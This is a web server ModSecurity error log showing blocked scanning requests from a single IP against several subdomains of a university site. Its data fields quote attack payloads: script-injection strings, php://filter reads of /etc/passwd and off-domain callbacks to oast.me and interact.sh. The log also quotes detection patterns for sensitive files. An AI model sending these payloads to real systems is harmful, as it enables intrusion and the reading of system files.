[Tue Aug 29 11:53:14.692120 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/Images/Remote"] [unique_id "ZO15usCo-f0AAAoLfREAAAAG"]
[Tue Aug 29 11:53:14.862885 2023] [:error] [pid 2595] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:Filename: Filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php"] [unique_id "ZO15usCo-f0AAAojapYAAAAb"]
[Tue Aug 29 11:53:15.534905 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO15u8Co-f0AAAog@DYAAAAY"]
[Tue Aug 29 11:53:15.761668 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO15u8Co-f0AAAnTla8AAAAA"]
[Tue Aug 29 11:53:15.771910 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO15u8Co-f0AAAog@DcAAAAY"]
[Tue Aug 29 11:53:15.772900 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/Images/Remote"] [unique_id "ZO15u8Co-f0AAAoW7OEAAAAJ"]
[Tue Aug 29 11:53:15.809743 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO15u8Co-f0AAAnd3Q8AAAAI"]
[Tue Aug 29 11:53:16.028927 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO15u8Co-f0AAAoT7VkAAAAD"]
[Tue Aug 29 11:53:16.543970 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);} found within ARGS:token: asdf\\x22);}alert(document.domain); function asdf() {//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/atutor/login.php"] [unique_id "ZO15vMCo-f0AAAoXJvUAAAAP"]
[Tue Aug 29 11:53:16.544907 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);} found within ARGS:token: asdf\\x22);}alert(document.domain); function asdf() {//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/atutor/login.php"] [unique_id "ZO15vMCo-f0AAAoW7OQAAAAJ"]
[Tue Aug 29 11:53:16.544994 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);} found within ARGS:token: asdf\\x22);}alert(document.domain); function asdf() {//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/atutor/login.php"] [unique_id "ZO15vMCo-f0AAAnTlbQAAAAA"]
[Tue Aug 29 11:53:16.555397 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);} found within ARGS:token: asdf\\x22);}alert(document.domain); function asdf() {//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/atutor/login.php"] [unique_id "ZO15vMCo-f0AAAni-CkAAAAU"]
[Tue Aug 29 11:53:16.565151 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);} found within ARGS:token: asdf\\x22);}alert(document.domain); function asdf() {//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/atutor/login.php"] [unique_id "ZO15vMCo-f0AAAoXJvYAAAAP"]
[Tue Aug 29 11:53:16.612868 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);} found within ARGS:token: asdf\\x22);}alert(document.domain); function asdf() {//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/atutor/login.php"] [unique_id "ZO15vMCo-f0AAAoW7OYAAAAJ"]
[Tue Aug 29 11:53:16.613606 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO15vMCo-f0AAAolKU8AAAAe"]
[Tue Aug 29 11:53:17.643902 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO15vcCo-f0AAAoesM0AAAAV"]
[Tue Aug 29 11:53:17.658174 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO15vcCo-f0AAAosCwEAAAAm"]
[Tue Aug 29 11:53:17.791414 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO15vcCo-f0AAAoqbQoAAAAj"]
[Tue Aug 29 11:53:17.850946 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO15vcCo-f0AAAoW7OoAAAAJ"]
[Tue Aug 29 11:53:17.874736 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO15vcCo-f0AAAoesNAAAAAV"]
[Tue Aug 29 11:53:18.565430 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php"] [unique_id "ZO15vsCo-f0AAAoW7OwAAAAJ"]
[Tue Aug 29 11:53:18.693479 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/dompdf.php"] [unique_id "ZO15vsCo-f0AAAoLfR4AAAAG"]
[Tue Aug 29 11:53:18.696110 2023] [:error] [pid 2595] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/dompdf.php"] [unique_id "ZO15vsCo-f0AAAojap4AAAAb"]
[Tue Aug 29 11:53:18.697429 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php"] [unique_id "ZO15vsCo-f0AAAoqbQwAAAAj"]
[Tue Aug 29 11:53:18.704186 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/dompdf.php"] [unique_id "ZO15vsCo-f0AAAolKVUAAAAe"]
[Tue Aug 29 11:53:18.716643 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php"] [unique_id "ZO15vsCo-f0AAAot8OQAAAAn"]
[Tue Aug 29 11:53:18.720180 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php"] [unique_id "ZO15vsCo-f0AAAfWOWIAAAAL"]
[Tue Aug 29 11:53:18.734095 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/dompdf.php"] [unique_id "ZO15vsCo-f0AAAoLfR8AAAAG"]
[Tue Aug 29 11:53:18.916129 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/dompdf.php"] [unique_id "ZO15vsCo-f0AAAnTlb4AAAAA"]
[Tue Aug 29 11:53:18.943587 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO15vsCo-f0AAAoXJvsAAAAP"]
[Tue Aug 29 11:53:19.774520 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/PhpSpreadsheet/Writer/PDF/DomPDF.php"] [unique_id "ZO15v8Co-f0AAAoT7WUAAAAD"]
[Tue Aug 29 11:53:19.848713 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"/><script>alert(1)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22/><script>alert(1)</script>: \\x22/><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15v8Co-f0AAAolKVcAAAAe"]
[Tue Aug 29 11:53:19.849088 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/PhpSpreadsheet/Writer/PDF/DomPDF.php"] [unique_id "ZO15v8Co-f0AAAofm6YAAAAX"]
